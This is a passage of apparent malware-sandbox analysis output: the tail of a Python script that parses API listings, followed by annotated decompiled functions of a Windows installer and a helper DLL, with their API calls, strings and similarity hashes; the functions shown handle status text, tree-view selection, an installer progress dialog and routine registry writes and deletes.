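    "registry": ("Reg",),
    "file": ("CreateFile", "WriteFile", "ReadFile", "DeleteFile", "CloseHandle"),
    "memory": ("GlobalAlloc", "GlobalFree", "VirtualAlloc", "HeapAlloc"),
    "ui": ("SendMessage", "SetWindowText", "SetDlgItemText", "SetTimer", "wsprintf"),
}


def parse_arg(tok):
    """'?' is an unresolved argument, 8 hex digits become an int, else a literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_listing(text):
    """Return {'apis': [...], 'strings': [...]} from the bullet lines."""
    apis, strings, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):      # section headers switch the parser mode
            section = line
            continue
        if not line.startswith("•"):         # anything else (dump sources, hashes) is ignored
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                continue
            args = m.group("args")
            apis.append({
                "api": m.group("api"),
                "module": m.group("module"),
                "args": [parse_arg(a) for a in args.split(",")] if args is not None else [],
                "ref": int(m.group("ref"), 16),
            })
        elif section == "Strings":
            body, _, xref = line[1:].strip().rpartition(", xrefs: ")
            if xref:
                strings.append({"string": body, "ref": int(xref, 16)})
    return {"apis": apis, "strings": strings}


def image_for(addr):
    """Attribute a call-site address to the image whose base lies at or below it."""
    base = max((b for b in IMAGE_BASES if b <= addr), default=None)
    return IMAGE_BASES.get(base, "unknown")


def categorize(api_name):
    for cat, prefixes in CATEGORIES.items():
        if api_name.startswith(prefixes):
            return cat
    return "other"


def summarize(parsed):
    """image -> category -> sorted API names seen in that image."""
    out = defaultdict(lambda: defaultdict(set))
    for rec in parsed["apis"]:
        out[image_for(rec["ref"])][categorize(rec["api"])].add(rec["api"])
    return {img: {c: sorted(v) for c, v in cats.items()} for img, cats in out.items()}


def literal_args(parsed):
    """Arguments the sandbox resolved to text (paths, key names), deduplicated."""
    return sorted({a for rec in parsed["apis"] for a in rec["args"] if isinstance(a, str)})


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for img, cats in summarize(parsed).items():
        print(img, cats)
    print("literals:", literal_args(parsed))
    print("strings:", [s["string"] for s in parsed["strings"]])
```

Run as a script it prints, per image, the API names grouped by category plus the resolved literals and referenced strings; the same parser can be pointed at a whole report, since every line that is not an "APIs"/"Strings" header or a bullet is skipped.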

                    C-Code - Quality: 100%
                    			/* Status/log line output: fills a 0x800-byte static buffer at 0x4297b0 from _a4,
                    			   optionally appends _a8, and shows the result as the window title and as a
                    			   list-view row. Flags at 0x42ec14: bit 0 = overwrite the last row instead of
                    			   inserting (and keep the buffer unchanged afterwards), bit 1 = no list-view
                    			   output, bit 2 = no title update. */
                    			E00404CC9(CHAR* _a4, CHAR* _a8) {
                    				struct HWND__* _v8;
                    				signed int _v12;
                    				CHAR* _v32;   /* LVITEM.pszText */
                    				long _v44;    /* LVITEM.iSubItem */
                    				int _v48;     /* LVITEM.iItem */
                    				void* _v52;   /* LVITEM.mask */
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				CHAR* _t26;
                    				signed int _t27;
                    				CHAR* _t28;
                    				long _t29;
                    				signed int _t39;
                    
                    				_t26 =  *0x42e344; // 0x0   list-view window handle
                    				_v8 = _t26;
                    				if(_t26 != 0) {
                    					_t27 =  *0x42ec14; // 0x0   output flags
                    					_v12 = _t27;
                    					_t39 = _t27 & 0x00000001;
                    					if(_t39 == 0) {
                    						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);   /* rebuild the buffer from _a4 */
                    					}
                    					_t26 = lstrlenA(0x4297b0);
                    					_a4 = _t26;   /* remember the length before any append */
                    					if(_a8 == 0) {
                    						L6:
                    						if((_v12 & 0x00000004) == 0) {
                    							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
                    						}
                    						if((_v12 & 0x00000002) == 0) {
                    							_v32 = 0x4297b0;
                    							_v52 = 1;   /* LVIF_TEXT */
                    							_t29 = SendMessageA(_v8, 0x1004, 0, 0);   /* LVM_GETITEMCOUNT */
                    							_v44 = 0;
                    							_v48 = _t29 - _t39;   /* new row, or the last row when bit 0 is set */
                    							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);   /* LVM_INSERTITEMA (0x1007) or LVM_SETITEMA (0x1006) */
                    							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);   /* LVM_ENSUREVISIBLE */
                    						}
                    						if(_t39 != 0) {
                    							_t28 = _a4;
                    							 *((char*)(_t28 + 0x4297b0)) = 0;   /* truncate the buffer back to its previous length */
                    							return _t28;
                    						}
                    					} else {
                    						_t26 =  &(_a4[lstrlenA(_a8)]);   /* combined length: current buffer + _a8 */
                    						if(_t26 < 0x800) {   /* bounds check against the static buffer before lstrcat */
                    							_t26 = lstrcatA(0x4297b0, _a8);
                    							goto L6;
                    						}
                    					}
                    				}
                    				return _t26;
                    			}

                    Addresses (one per decompiled statement, in order): 0x00404ccf 0x00404cdb 0x00404cde 0x00404ce4 0x00404cf0 0x00404cf3 0x00404cf6 0x00404cfc 0x00404cfc 0x00404d02 0x00404d0a 0x00404d0d 0x00404d2a 0x00404d2e 0x00404d37 0x00404d37 0x00404d41 0x00404d4a 0x00404d56 0x00404d5d 0x00404d61 0x00404d64 0x00404d77 0x00404d85 0x00404d85 0x00404d89 0x00404d8b 0x00404d8e 0x00000000 0x00404d8e 0x00404d0f 0x00404d17 0x00404d1f 0x00404d25 0x00000000 0x00404d25 0x00404d1f 0x00404d0d 0x00404d98

                    APIs
                    • lstrlenA.KERNEL32(004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                    • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                    • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F887,74E5EA30), ref: 00404D25
                    • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                    • String ID:
                    • API String ID: 2531174081-0
                    • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                    • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                    • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                    • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			/* Tree-view helper: returns the lParam of either the selected item (_a8 == 0)
                    			   or the item under the last mouse position (_a8 != 0); -1 if the click did
                    			   not land on an item. */
                    			E00404598(struct HWND__* _a4, intOrPtr _a8) {
                    				long _v8;           /* TVHITTESTINFO.hItem */
                    				signed char _v12;   /* TVHITTESTINFO.flags */
                    				unsigned int _v16;  /* TVHITTESTINFO.pt.y */
                    				void* _v20;         /* TVHITTESTINFO.pt.x */
                    				intOrPtr _v24;      /* TVITEM.lParam */
                    				long _v56;          /* TVITEM.hItem */
                    				void* _v60;         /* TVITEM.mask */
                    				long _t15;
                    				unsigned int _t19;
                    				signed int _t25;
                    				struct HWND__* _t28;
                    
                    				_t28 = _a4;
                    				_t15 = SendMessageA(_t28, 0x110a, 9, 0);   /* TVM_GETNEXTITEM, TVGN_CARET: selected item */
                    				if(_a8 == 0) {
                    					L4:
                    					_v56 = _t15;
                    					_v60 = 4;   /* TVIF_PARAM */
                    					SendMessageA(_t28, 0x110c, 0,  &_v60);   /* TVM_GETITEMA */
                    					return _v24;
                    				}
                    				_t19 = GetMessagePos();
                    				_v16 = _t19 >> 0x10;   /* y */
                    				_v20 = _t19;           /* x (low word) */
                    				ScreenToClient(_t28,  &_v20);
                    				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);   /* TVM_HITTEST */
                    				/* 0x66 = TVHT_ONITEMICON | TVHT_ONITEMLABEL | TVHT_ONITEMRIGHT | TVHT_ONITEMSTATEICON */
                    				if((_v12 & 0x00000066) != 0) {
                    					_t15 = _v8;
                    					goto L4;
                    				}
                    				return _t25 | 0xffffffff;
                    			}

                    Addresses (one per decompiled statement, in order): 0x004045a6 0x004045b3 0x004045b9 0x004045f7 0x004045f7 0x00404606 0x0040460d 0x00000000 0x0040460f 0x004045bb 0x004045ca 0x004045d2 0x004045d5 0x004045e7 0x004045ed 0x004045f4 0x00000000 0x004045f4 0x00000000

                    APIs
                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004045B3
                    • GetMessagePos.USER32 ref: 004045BB
                    • ScreenToClient.USER32 ref: 004045D5
                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 004045E7
                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040460D
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                    • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                    • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                    • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			/* Dialog procedure for the "verifying installer" progress window. */
                    			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                    				char _v68;
                    				int _t11;
                    				int _t20;
                    
                    				if(_a8 == 0x110) {   /* WM_INITDIALOG: start a 250 ms (0xfa) timer, then handle as WM_TIMER */
                    					SetTimer(_a4, 1, 0xfa, 0);
                    					_a8 = 0x113;
                    				}
                    				if(_a8 == 0x113) {   /* WM_TIMER: refresh the percentage text */
                    					_t20 =  *0x414b78; // 0x497ec   progress so far
                    					_t11 =  *0x428b88; // 0x497f0   total
                    					if(_t20 >= _t11) {   /* clamp to 100% */
                    						_t20 = _t11;
                    					}
                    					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));   /* progress * 100 / total */
                    					SetWindowTextA(_a4,  &_v68);
                    					SetDlgItemTextA(_a4, 0x406,  &_v68);
                    				}
                    				return 0;
                    			}

                    Addresses (one per decompiled statement, in order): 0x00402b3a 0x00402b48 0x00402b4e 0x00402b4e 0x00402b5c 0x00402b5e 0x00402b64 0x00402b6b 0x00402b6d 0x00402b6d 0x00402b83 0x00402b93 0x00402ba5 0x00402ba5 0x00402bad

                    Strings
                    • verifying installer: %d%%, xrefs: 00402B7D
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: verifying installer: %d%%
                    • API String ID: 1451636040-82062127
                    • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                    • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                    • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                    • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrcpynW.KERNEL32(?,?,00000027), ref: 10003436
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 10003499
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Openlstrcpyn
                    • String ID: %s\%s\0x%08x$(%p)$LanguageProfile
                    • API String ID: 77534328-1421907492
                    • Opcode ID: 8617eb1d37519ed72dbf691270368273f7a7b12cf0c75b2d9c0fbcd5a4e1f924
                    • Instruction ID: e74b1b57bdee69e3c40b0046c9d5394c684b0be539b2a5ccb054f59891e547b5
                    • Opcode Fuzzy Hash: 8617eb1d37519ed72dbf691270368273f7a7b12cf0c75b2d9c0fbcd5a4e1f924
                    • Instruction Fuzzy Hash: CF3109B9D00208EFEB04DF94C845B9DB7B9EB48301F108199E905AB356E734AE94CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • unsupported interface: %s, xrefs: 1000163F
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: _memcmp
                    • String ID: unsupported interface: %s
                    • API String ID: 2931989736-1937909893
                    • Opcode ID: eb18e4a19cd9a3165352f80dcf57e129060a496f7e44f33b43d9baf351e6e7e5
                    • Instruction ID: 7c10261f5906ee17d947ea3f4a8e792d088b6279f5499b9da523b12589321c60
                    • Opcode Fuzzy Hash: eb18e4a19cd9a3165352f80dcf57e129060a496f7e44f33b43d9baf351e6e7e5
                    • Instruction Fuzzy Hash: 8F3128B9900209AFEB00DFA0DC45BEE77B1EB89384F108568F9055B345D775EA90DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • (%p)->(IID_IEnumTfInputProcessorProfiles %p), xrefs: 10001204
                    • (%p)->(IID_IUnknown %p), xrefs: 100011C9
                    • (%p)->(%s %p), xrefs: 10001239
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: _memcmp
                    • String ID: (%p)->(%s %p)$(%p)->(IID_IEnumTfInputProcessorProfiles %p)$(%p)->(IID_IUnknown %p)
                    • API String ID: 2931989736-4158896418
                    • Opcode ID: b4b90f2b2d8e93eb586a7039b38698f74faf070e3b4c6432db6c20f5010c130a
                    • Instruction ID: ccfe8b419fb6f1a1e80aa053a51e6f8483e75306c93c4cf4ae7d8f4c903e6c9b
                    • Opcode Fuzzy Hash: b4b90f2b2d8e93eb586a7039b38698f74faf070e3b4c6432db6c20f5010c130a
                    • Instruction Fuzzy Hash: EA211AF9D00209EBEB00DFA4DC41FEE73B4EB98240F108568F9149B345E635EA608B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			/* Registry write: creates or opens the key named by E004029E8(0x11) under the root
                    			   key in __eax, then stores the value named by E004029E8(2) with type _t35
                    			   (1 = string, 3 = binary, 4 = DWORD, matching REG_SZ / REG_BINARY / REG_DWORD)
                    			   from the buffer at 0x40a378. _t27 is passed as 0/NULL throughout (the decompiler
                    			   dropped its initialisation); a failed RegSetValueExA leaves the error flag set and
                    			   bumps the counter at 0x42ebe8. */
                    			E004022F5(void* __eax) {
                    				void* _t15;
                    				char* _t18;
                    				int _t19;
                    				char _t24;
                    				int _t27;
                    				signed int _t30;
                    				intOrPtr _t35;
                    				void* _t37;
                    
                    				_t15 = E00402ADD(__eax);   /* root key (HKEY) */
                    				_t35 =  *((intOrPtr*)(_t37 - 0x14));   /* value type selector */
                    				 *(_t37 - 0x30) =  *(_t37 - 0x10);      /* registry data type passed to RegSetValueExA */
                    				 *(_t37 - 0x44) = E004029E8(2);        /* value name */
                    				_t18 = E004029E8(0x11);                /* subkey name */
                    				_t30 =  *0x42ec10; // 0x0
                    				 *(_t37 - 4) = 1;   /* error flag, cleared on success */
                    				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);   /* samDesired = *0x42ec10 | KEY_SET_VALUE */
                    				if(_t19 == 0) {
                    					if(_t35 == 1) {   /* string: data length is lstrlen + terminating NUL */
                    						E004029E8(0x23);
                    						_t19 = lstrlenA(0x40a378) + 1;
                    					}
                    					if(_t35 == 4) {   /* DWORD: 4 bytes from E004029CB(3) */
                    						_t24 = E004029CB(3);
                    						 *0x40a378 = _t24;
                    						_t19 = _t35;
                    					}
                    					if(_t35 == 3) {   /* binary: up to 0xc00 bytes read via E00402E44 */
                    						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
                    					}
                    					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
                    						 *(_t37 - 4) = _t27;   /* success */
                    					}
                    					_push( *(_t37 + 8));
                    					RegCloseKey();
                    				}
                    				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);   /* running error count */
                    				return 0;
                    			}

                    Addresses (one per decompiled statement, in order): 0x004022f6 0x004022fb 0x00402305 0x0040230f 0x00402312 0x0040231c 0x0040232c 0x00402333 0x0040233b 0x00402349 0x0040234d 0x00402358 0x00402358 0x0040235c 0x00402360 0x00402366 0x0040236b 0x0040236b 0x0040236f 0x0040237b 0x0040237b 0x00402394 0x00402396 0x00402396 0x00402399 0x0040246f 0x0040246f 0x00402880 0x0040288c

                    APIs
                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CloseCreateValuelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp
                    • API String ID: 1356686001-3524788646
                    • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                    • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                    • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                    • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10001720
                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001772
                    • RegCloseKey.ADVAPI32(?), ref: 10001787
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CloseCreateFromString
                    • String ID: %s\%s$(%p) %s
                    • API String ID: 1280075732-2567790950
                    • Opcode ID: 6058f6cab652c679ae98a7a00b3378d25a29b0b7d9c5b42de71129f040af4d03
                    • Instruction ID: ddd5b884b486775e058ac94a5c57042e1aa085f8b660312c68e200d0e7e7e264
                    • Opcode Fuzzy Hash: 6058f6cab652c679ae98a7a00b3378d25a29b0b7d9c5b42de71129f040af4d03
                    • Instruction Fuzzy Hash: 8A115AF5940208BBF710DBE0DC46FEE77BCEB48740F008558F609AA145E675E78487A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100017E3
                    • RegDeleteTreeW.ADVAPI32(80000002,?), ref: 10001825
                    • RegDeleteTreeW.ADVAPI32(80000001,?), ref: 10001837
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: DeleteTree$FromString
                    • String ID: %s\%s$(%p) %s
                    • API String ID: 1665489665-2567790950
                    • Opcode ID: 4f4860d476eadf567847e58d8668f50af0e2e0c9411abc5ad5f3ebdd19084769
                    • Instruction ID: c32eb2806e8eb754a7854039dc35f3223ba678f3a048cb766775b8edaa35da08
                    • Opcode Fuzzy Hash: 4f4860d476eadf567847e58d8668f50af0e2e0c9411abc5ad5f3ebdd19084769
                    • Instruction Fuzzy Hash: A501E1F6900118FBFB10DBA09C46F9A73BCEB58244F00C195FA0996106EA35EA548B71
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegCloseKey.ADVAPI32(?), ref: 10002E9B
                    • RegCloseKey.ADVAPI32(00000000), ref: 10002EB1
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 10002ED1
                    • HeapFree.KERNEL32(00000000), ref: 10002ED8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CloseHeap$FreeProcess
                    • String ID: destroying %p
                    • API String ID: 3033025533-3738993722
                    • Opcode ID: 113a30b3c754bed19753c43a4249d6e94444856eadafc96bb9b83829241b3bf4
                    • Instruction ID: a07f0266e4b16ebb796c43b524b7ea231476f579fd1ec2cde56296d4f59b991d
                    • Opcode Fuzzy Hash: 113a30b3c754bed19753c43a4249d6e94444856eadafc96bb9b83829241b3bf4
                    • Instruction Fuzzy Hash: A4F07479600208AFD701EF54C884EAA7BA9FB8D355F10C148F9098B355C731EE85CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E00402A28(void* _a4, char* _a8, long _a12) {
                    				void* _v8;
                    				char _v272;
                    				signed char _t16;
                    				long _t18;
                    				long _t25;
                    				intOrPtr* _t27;
                    				long _t28;
                    
                    				_t16 =  *0x42ec10; // 0x0
                    				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                    				if(_t18 == 0) {
                    					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                    						__eflags = _a12;
                    						if(_a12 != 0) {
                    							RegCloseKey(_v8);
                    							L8:
                    							__eflags = 1;
                    							return 1;
                    						}
                    						_t25 = E00402A28(_v8,  &_v272, 0);
                    						__eflags = _t25;
                    						if(_t25 != 0) {
                    							break;
                    						}
                    					}
                    					RegCloseKey(_v8);
                    					_t27 = E00405C49(2);
                    					if(_t27 == 0) {
                    						__eflags =  *0x42ec10; // 0x0
                    						if(__eflags != 0) {
                    							goto L8;
                    						}
                    						_t28 = RegDeleteKeyA(_a4, _a8);
                    						__eflags = _t28;
                    						if(_t28 != 0) {
                    							goto L8;
                    						}
                    						return _t28;
                    					}
                    					return  *_t27(_a4, _a8,  *0x42ec10, 0);
                    				}
                    				return _t18;
                    			}

                    Addresses: 0x00402a38, 0x00402a49, 0x00402a51, 0x00402a79, 0x00402a60, 0x00402a63, 0x00402ab3, 0x00402ab9, 0x00402abb, 0x00000000, 0x00402abb, 0x00402a70, 0x00402a75, 0x00402a77, 0x00000000, 0x00000000, 0x00402a77, 0x00402a8e, 0x00402a96, 0x00402a9d, 0x00402ac3, 0x00402ac9, 0x00000000, 0x00000000, 0x00402ad1, 0x00402ad7, 0x00402ad9, 0x00000000, 0x00000000, 0x00000000, 0x00402ad9, 0x00000000, 0x00402aac, 0x00402ac0

                    APIs
                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                    • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                    • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Close$DeleteEnumOpen
                    • String ID:
                    • API String ID: 1912718029-0
                    • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                    • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                    • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
